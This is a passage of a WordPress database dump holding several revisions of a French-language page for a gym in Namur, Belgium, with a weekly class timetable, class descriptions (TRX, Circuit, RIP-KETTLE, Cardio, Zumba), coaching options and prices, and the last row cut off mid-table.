(411, 1, '2014-01-18 19:00:18', '2014-01-18 19:00:18', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\n<img class=\"alignnone size-full wp-image-409\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:00:18', '2014-01-18 19:00:18', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(410, 1, '2014-01-18 18:59:35', '2014-01-18 18:59:35', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\"><img class=\"alignnone size-full wp-image-409\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></a></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h1></h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 18:59:35', '2014-01-18 18:59:35', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(494, 3, '2015-09-02 17:04:16', '2015-09-02 17:04:16', '', 'nouvelles seances CT', '', 'inherit', 'open', 'open', '', 'nouvelles-seances-ct', '', '', '2015-09-02 17:04:16', '2015-09-02 17:04:16', '', 363, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-CT.png', 0, 'attachment', 'image/png', 0),
(413, 1, '2014-01-18 19:04:21', '2014-01-18 19:04:21', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nZumba</td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\nZumba</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<img class=\"alignnone size-full wp-image-409\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:04:21', '2014-01-18 19:04:21', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(414, 1, '2014-01-18 19:05:20', '2014-01-18 19:05:20', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"tglfe\"><b>11h45</b>\r\nCircuit</td>\r\n<td class=\"trip\"><b>11h45</b>\r\nRIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h00</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h00</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcardio\"><b>19h45</b>\r\nZumba</td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>19h45</b>\r\nZumba</td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:05:20', '2014-01-18 19:05:20', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(415, 1, '2014-01-18 19:07:15', '2014-01-18 19:07:15', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nNamur\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Limelette\" href=\"http://www.crosstrainingcenter.be/les-seances-limelette/\">Limelette</a>\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Namur :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>17h30</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>17h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>17h30</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nTRX</td>\r\n<td class=\"ttrx\"><b>11h00</b>\r\nTRX</td>\r\n<td class=\"tglfe\"><b>11h00</b>\r\nCircuit</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tglfe\"><b>18h15</b>\r\nCircuit</td>\r\n<td class=\"ttrx\"><b>18h15</b>\r\nTRX</td>\r\n<td class=\"tcardio\"><b>18h15</b>\r\nCARDIO</td>\r\n<td 